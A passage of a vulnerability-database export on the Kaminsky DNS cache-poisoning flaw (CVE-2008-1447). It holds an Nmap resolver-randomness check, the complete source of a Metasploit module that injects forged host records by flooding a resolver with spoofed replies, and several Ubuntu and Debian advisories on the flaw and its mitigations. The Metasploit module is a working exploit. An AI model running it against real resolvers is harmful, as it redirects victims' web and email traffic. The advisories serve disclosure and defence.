In addition your IP address will be sent along with the\ntxidtest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\ntxidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-txid <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n-- This script uses (with permission) Duane Wessels' txidtest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbabe\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: txidtest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xba, 0xbe, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"txidtest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. 
\"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xba\n or string.byte(result, 2) ~= 0xbe) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. 
If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "metasploit": [{"lastseen": "2020-10-06T04:17:56", "description": "This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. 
Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "DNS BailiWicked Host Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "1976-01-01T00:00:00", "id": "MSF:AUXILIARY/SPOOF/DNS/BAILIWICKED_HOST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/dns'\nrequire 'resolv'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DNS BailiWicked Host Attack',\n 'Description' => %q{\n This exploit attacks a fairly ubiquitous flaw in DNS implementations which\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single\n malicious host entry into the target nameserver by sending random hostname\n queries to the target DNS server coupled with spoofed replies to those\n queries from the authoritative nameservers for that domain. 
Eventually, a\n guessed ID will match, the spoofed packet will get accepted, and due to the\n additional hostname entry being within bailiwick constraints of the original\n request the malicious host entry will get cached.\n },\n 'Author' => [ 'I)ruid', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-1447' ],\n [ 'OSVDB', '46776'],\n [ 'US-CERT-VU', '800113' ],\n [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\n ],\n 'DisclosureDate' => 'Jul 21 2008'\n ))\n\n register_options(\n [\n OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),\n OptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]),\n OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),\n OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),\n OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),\n OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),\n OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]),\n\n ])\n\n deregister_options('FILTER','PCAPFILE')\n\n end\n\n def auxiliary_commands\n return {\n \"racer\" => \"Determine the size of the window for the target server\"\n }\n end\n\n def cmd_racer(*args)\n targ = args[0] || rhost()\n dom = args[1] || \"example.com\"\n\n if !(targ and targ.length > 0)\n print_status(\"usage: racer [dns-server] [domain]\")\n return\n end\n\n calculate_race(targ, dom)\n end\n\n def check\n targ = rhost\n\n srv_sock = Rex::Socket.create_udp(\n 'PeerHost' => targ,\n 'PeerPort' => 53\n )\n\n random = false\n ports = {}\n lport = nil\n reps = 0\n\n 1.upto(30) do |i|\n\n req = Resolv::DNS::Message.new\n txt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n req.rd = 1\n\n 
srv_sock.put(req.encode)\n res, addr = srv_sock.recvfrom(65535, 1.0)\n\n\n if res and res.length > 0\n reps += 1\n res = Resolv::DNS::Message.decode(res)\n res.each_answer do |name, ttl, data|\n if (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n t_addr, t_port = $1.split(':')\n\n vprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\")\n t_port = t_port.to_i\n if(lport and lport != t_port)\n random = true\n end\n lport = t_port\n ports[t_port] ||=0\n ports[t_port] +=1\n end\n end\n end\n\n\n if(i>5 and ports.keys.length == 0)\n break\n end\n end\n\n srv_sock.close\n\n if(ports.keys.length == 0)\n vprint_error(\"ERROR: This server is not replying to recursive requests\")\n return Exploit::CheckCode::Unknown\n end\n\n if(reps < 30)\n vprint_warning(\"WARNING: This server did not reply to all of our requests\")\n end\n\n if(random)\n ports_u = ports.keys.length\n ports_r = ((ports.keys.length/30.0)*100).to_i\n print_status(\"PASS: This server does not use a static source port. 
Randomness: #{ports_u}/30 %#{ports_r}\")\n if(ports_r != 100)\n vprint_status(\"INFO: This server's source ports are not really random and may still be exploitable, but not by this tool.\")\n # Not exploitable by this tool, so we lower this to Appears on purpose to lower the user's confidence\n return Exploit::CheckCode::Appears\n end\n else\n vprint_error(\"FAIL: This server uses a static source port and is vulnerable to poisoning\")\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run\n check_pcaprub_loaded # Check first.\n\n target = rhost()\n source = Rex::Socket.source_address(target)\n saddr = datastore['SRCADDR']\n sport = datastore['SRCPORT']\n hostname = datastore['HOSTNAME'] + '.'\n address = datastore['NEWADDR']\n recons = datastore['RECONS']\n xids = datastore['XIDS'].to_i\n newttl = datastore['TTL'].to_i\n xidbase = rand(20001) + 20000\n numxids = xids\n\n domain = hostname.sub(/\\w+\\x2e/,\"\")\n\n srv_sock = Rex::Socket.create_udp(\n 'PeerHost' => target,\n 'PeerPort' => 53\n )\n\n # Get the source port via the metasploit service if it's not set\n if sport.to_i == 0\n req = Resolv::DNS::Message.new\n txt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n req.rd = 1\n\n srv_sock.put(req.encode)\n res, addr = srv_sock.recvfrom()\n\n if res and res.length > 0\n res = Resolv::DNS::Message.decode(res)\n res.each_answer do |name, ttl, data|\n if (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n t_addr, t_port = $1.split(':')\n sport = t_port.to_i\n\n print_status(\"Switching to target port #{sport} based on Metasploit service\")\n if target != t_addr\n print_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\")\n end\n end\n end\n end\n end\n\n # Verify its not already cached\n begin\n query = Resolv::DNS::Message.new\n 
query.add_question(hostname, Resolv::DNS::Resource::IN::A)\n query.rd = 0\n\n begin\n cached = false\n srv_sock.put(query.encode)\n answer, addr = srv_sock.recvfrom()\n\n if answer and answer.length > 0\n answer = Resolv::DNS::Message.decode(answer)\n answer.each_answer do |name, ttl, data|\n\n if((name.to_s + \".\") == hostname)\n t = Time.now + ttl\n print_error(\"Failure: This hostname is already in the target cache: #{name}\")\n print_error(\" Cache entry expires on #{t}... sleeping.\")\n cached = true\n select(nil,nil,nil,ttl)\n end\n end\n\n end\n end until not cached\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\")\n end\n\n res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\n\n print_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\"\n\n # Look up the nameservers for the domain\n print_status \"Querying recon nameserver for #{domain}'s nameservers...\"\n answer0 = res0.send(domain, Net::DNS::NS)\n #print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\"\n\n barbs = [] # storage for nameservers\n answer0.answer.each do |rr0|\n print_status \" Got an #{rr0.type} record: #{rr0.inspect}\"\n if rr0.type == 'NS'\n print_status \" Querying recon nameserver for address of #{rr0.nsdname}...\"\n answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\n #print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\"\n answer1.answer.each do |rr1|\n print_status \" Got an #{rr1.type} record: #{rr1.inspect}\"\n res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)\n print_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\"\n answer2 = res2.send(domain, Net::DNS::SOA)\n if answer2 
and answer2.header.auth? and answer2.header.anCount >= 1\n nsrec = {:name => rr0.nsdname, :addr => rr1.address}\n barbs << nsrec\n print_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\"\n end\n end\n end\n end\n\n if barbs.length == 0\n print_status( \"No DNS servers found.\")\n srv_sock.close\n close_pcap\n return\n end\n\n\n if(xids == 0)\n print_status(\"Calculating the number of spoofed replies to send per query...\")\n qcnt = calculate_race(target, domain, 100)\n numxids = ((qcnt * 1.5) / barbs.length).to_i\n if(numxids == 0)\n print_status(\"The server did not reply, giving up.\")\n srv_sock.close\n close_pcap\n return\n end\n print_status(\"Sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query\")\n end\n\n # Flood the target with queries and spoofed responses, one will eventually hit\n queries = 0\n responses = 0\n\n\n open_pcap unless self.capture\n\n print_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\")\n\n while true\n randhost = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' 
+ domain # randomize the hostname\n\n # Send spoofed query\n req = Resolv::DNS::Message.new\n req.id = rand(2**16)\n req.add_question(randhost, Resolv::DNS::Resource::IN::A)\n\n req.rd = 1\n\n src_ip = source\n\n if(saddr == 'Random')\n src_ip = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\")\n end\n\n p = PacketFu::UDPPacket.new\n p.ip_saddr = src_ip\n p.ip_daddr = target\n p.ip_ttl = 255\n p.udp_sport = (rand((2**16)-1024)+1024).to_i\n p.udp_dport = 53\n p.payload = req.encode\n p.recalc\n\n capture_sendto(p, target)\n\n queries += 1\n\n # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\n req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\n req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\n req.add_additional(hostname, newttl, Resolv::DNS::Resource::IN::A.new(address))\n req.qr = 1\n req.ra = 1\n\n # Reuse our PacketFu object\n p.udp_sport = 53\n p.udp_dport = sport.to_i\n\n xidbase.upto(xidbase+numxids-1) do |id|\n req.id = id\n p.payload = req.encode\n barbs.each do |barb|\n p.ip_saddr = barb[:addr].to_s\n p.recalc\n capture_sendto(p, target)\n responses += 1\n end\n end\n\n # status update\n if queries % 1000 == 0\n print_status(\"Sent #{queries} queries and #{responses} spoofed responses...\")\n if(xids == 0)\n print_status(\"Recalculating the number of spoofed replies to send per query...\")\n qcnt = calculate_race(target, domain, 25)\n numxids = ((qcnt * 1.5) / barbs.length).to_i\n if(numxids == 0)\n print_status(\"The server has stopped replying, giving up.\")\n srv_sock.close\n close_pcap\n return\n end\n print_status(\"Now sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query\")\n end\n end\n\n # every so often, check and see if the target is poisoned...\n if queries % 250 == 0\n begin\n query = Resolv::DNS::Message.new\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\n query.rd = 0\n\n 
srv_sock.put(query.encode)\n answer, addr = srv_sock.recvfrom()\n\n if answer and answer.length > 0\n answer = Resolv::DNS::Message.decode(answer)\n answer.each_answer do |name, ttl, data|\n if((name.to_s + \".\") == hostname)\n print_good(\"Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}\")\n print_status(\"TTL: #{ttl} DATA: #{data}\")\n close_pcap\n return\n end\n end\n end\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\")\n end\n end\n end\n end\n\n #\n # Send a recursive query to the target server, then flood\n # the server with non-recursive queries for the same entry.\n # Calculate how many non-recursive queries we receive back\n # until the real server responds. This should give us a\n # ballpark figure for ns->ns latency. We can repeat this\n # a few times to account for each nameserver the cache server\n # may query for the target domain.\n #\n def calculate_race(server, domain, num=50)\n\n q_beg_t = nil\n q_end_t = nil\n cnt = 0\n\n times = []\n\n hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain\n\n sock = Rex::Socket.create_udp(\n 'PeerHost' => server,\n 'PeerPort' => 53\n )\n\n\n req = Resolv::DNS::Message.new\n req.add_question(hostname, Resolv::DNS::Resource::IN::A)\n req.rd = 1\n req.id = 1\n\n q_beg_t = Time.now.to_f\n sock.put(req.encode)\n req.rd = 0\n\n while(times.length < num)\n res, addr = sock.recvfrom(65535, 0.01)\n\n if res and res.length > 0\n res = Resolv::DNS::Message.decode(res)\n\n if(res.id == 1)\n times << [Time.now.to_f - q_beg_t, cnt]\n cnt = 0\n\n hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' 
+ domain\n\n sock.close\n sock = Rex::Socket.create_udp(\n 'PeerHost' => server,\n 'PeerPort' => 53\n )\n\n q_beg_t = Time.now.to_f\n req = Resolv::DNS::Message.new\n req.add_question(hostname, Resolv::DNS::Resource::IN::A)\n req.rd = 1\n req.id = 1\n\n sock.put(req.encode)\n req.rd = 0\n end\n\n cnt += 1\n end\n\n req.id += 1\n\n sock.put(req.encode)\n end\n\n min_time = (times.map{|i| i[0]}.min * 100).to_i / 100.0\n max_time = (times.map{|i| i[0]}.max * 100).to_i / 100.0\n sum = 0\n times.each{|i| sum += i[0]}\n avg_time = (\t(sum / times.length) * 100).to_i / 100.0\n\n min_count = times.map{|i| i[1]}.min\n max_count = times.map{|i| i[1]}.max\n sum = 0\n times.each{|i| sum += i[1]}\n avg_count = sum / times.length\n\n sock.close\n\n print_status(\" race calc: #{times.length} queries | min/max/avg time: #{min_time}/#{max_time}/#{avg_time} | min/max/avg replies: #{min_count}/#{max_count}/#{avg_count}\")\n\n\n # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)\n avg_count\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/spoof/dns/bailiwicked_host.rb"}], "ubuntu": [{"lastseen": "2020-07-08T23:41:00", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries \nand poison DNS caches. 
Among other things, this could lead to \nmisdirected email and web traffic.", "edition": 5, "modified": "2008-07-22T00:00:00", "published": "2008-07-22T00:00:00", "id": "USN-627-1", "href": "https://ubuntu.com/security/notices/USN-627-1", "title": "Dnsmasq vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:19:47", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1603-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nNote that this security update changes BIND network behavior in a\nfundamental way, and the following steps are recommended to ensure a\nsmooth upgrade.\n\n\n1. Make sure that your network configuration is compatible with source\nport randomization. If you guard your resolver with a stateless packet\nfilter, you may need to make sure that no non-DNS services listen on\nthe 1024--65535 UDP port range and open it at the packet filter. 
For\ninstance, packet filters based on etch's Linux 2.6.18 kernel only\nsupport stateless filtering of IPv6 packets, and therefore pose this\nadditional difficulty. (If you use IPv4 with iptables and ESTABLISHED\nrules, networking changes are likely not required.)\n\n2. Install the BIND 9 upgrade, using "apt-get update" followed by\n"apt-get install bind9". Verify that the named process has been\nrestarted and answers recursive queries. (If all queries result in\ntimeouts, this indicates that networking changes are necessary; see the\nfirst step.)\n\n3. Verify that source port randomization is active. Check that the\n/var/log/daemon.log file does not contain messages of the following\nform\n\n named[6106]: /etc/bind/named.conf.options:28: using specific\n query-source port suppresses port randomization and can be insecure.\n\nright after the "listening on IPv6 interface" and "listening on IPv4\ninterface" messages logged by BIND upon startup. If these messages are\npresent, you should remove the indicated lines from the configuration,\nor replace the port numbers contained within them with the "*" sign (e.g.,\nreplace "port 53" with "port *").\n\nFor additional certainty, use tcpdump or some other network monitoring\ntool to check for varying UDP source ports. If there is a NAT device\nin front of your resolver, make sure that it does not defeat the\neffect of source port randomization.\n\n4. If you cannot activate source port randomization, consider\nconfiguring BIND 9 to forward queries to a resolver which can, possibly\nover a VPN such as OpenVPN to create the necessary trusted network link.\n(Use BIND's forward-only mode in this case.)\n\n\nOther caching resolvers distributed by Debian (PowerDNS, MaraDNS,\nUnbound) already employ source port randomization, and no updated\npackages are needed. BIND 9.5 up to and including version\n1:9.5.0.dfsg-4 only implements a weak form of source port\nrandomization and needs to be updated as well. 
For information on\nBIND 8, see DSA-1604-1, and for the status of the libc stub resolver,\nsee DSA-1605-1.\n\nThe updated bind9 packages contain changes originally scheduled for\nthe next stable point release, including the changed IP address of\nL.ROOT-SERVERS.NET (Debian bug #449148).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2008-07-08T17:03:22", "published": "2008-07-08T17:03:22", "id": "DEBIAN:DSA-1603-1:C7E04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00184.html", "title": "[SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1604-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. 
Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThe BIND 8 legacy code base could not be updated to include the\nrecommended countermeasure (source port randomization, see DSA-1603-1\nfor details). There are two ways to deal with this situation:\n\n1. Upgrade to BIND 9 (or another implementation with source port\nrandomization). The documentation included with BIND 9 contains a\nmigration guide.\n\n2. Configure the BIND 8 resolver to forward queries to a BIND 9\nresolver. Provided that the network between both resolvers is trusted,\nthis protects the BIND 8 resolver from cache poisoning attacks (to the\nsame degree that the BIND 9 resolver is protected).\n\nThis problem does not apply to BIND 8 when used exclusively as an\nauthoritative DNS server. It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended.\nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:04:04", "published": "2008-07-08T17:04:04", "id": "DEBIAN:DSA-1604-1:E1CB3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00185.html", "title": "[SECURITY] [DSA 1604-1] BIND 8 deprecation notice", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1605-1 
security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS spoofing and cache poisoning attacks. Among\nother things, successful attacks can lead to misdirected web traffic\nand email rerouting.\n\nAt this time, it is not possible to implement the recommended\ncountermeasures in the GNU libc stub resolver. The following\nworkarounds are available:\n\n1. Install a local BIND 9 resolver on the host, possibly in\nforward-only mode. BIND 9 will then use source port randomization\nwhen sending queries over the network. (Other caching resolvers can\nbe used instead.)\n\n2. Rely on IP address spoofing protection if available. 
Successful\nattacks must spoof the address of one of the resolvers, which may not\nbe possible if the network is guarded properly against IP spoofing\nattacks (both from internal and external sources).\n\nThis DSA will be updated when patches for hardening the stub resolver\nare available.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:05:37", "published": "2008-07-08T17:05:37", "id": "DEBIAN:DSA-1605-1:9D185", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00186.html", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1623-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 31, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dnsmasq\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's dnsmasq packages to implement the\nrecommended countermeasure: UDP query source port randomization. 
This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nThis update also switches the random number generator to Dan\nBernstein's SURF.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.35-1+etch4. Packages for alpha will be provided later.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.43-1.\n\nWe recommend that you upgrade your dnsmasq package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": 
"2008-07-31T16:45:43", "published": "2008-07-31T16:45:43", "id": "DEBIAN:DSA-1623-1:F6633", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00208.html", "title": "[SECURITY] [DSA 1623-1] New dnsmasq packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1619-2 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nSeptember 22, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : python-dns\nVulnerability : DNS response spoofing\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nDebian Bug : 490217\n\nIn DSA-1619-1, an update was announced for DNS response spoofing\nvulnerabilities in python-dns. The fix introduced a regression in the\nlibrary breaking the resolution of UTF-8 encoded record names. An\nupdated release is available which corrects this problem. For\nreference, the original advisory text follows.\n\nMultiple weaknesses have been identified in PyDNS, a DNS client\nimplementation for the Python language. Dan Kaminsky identified a\npractical vector of DNS response spoofing and 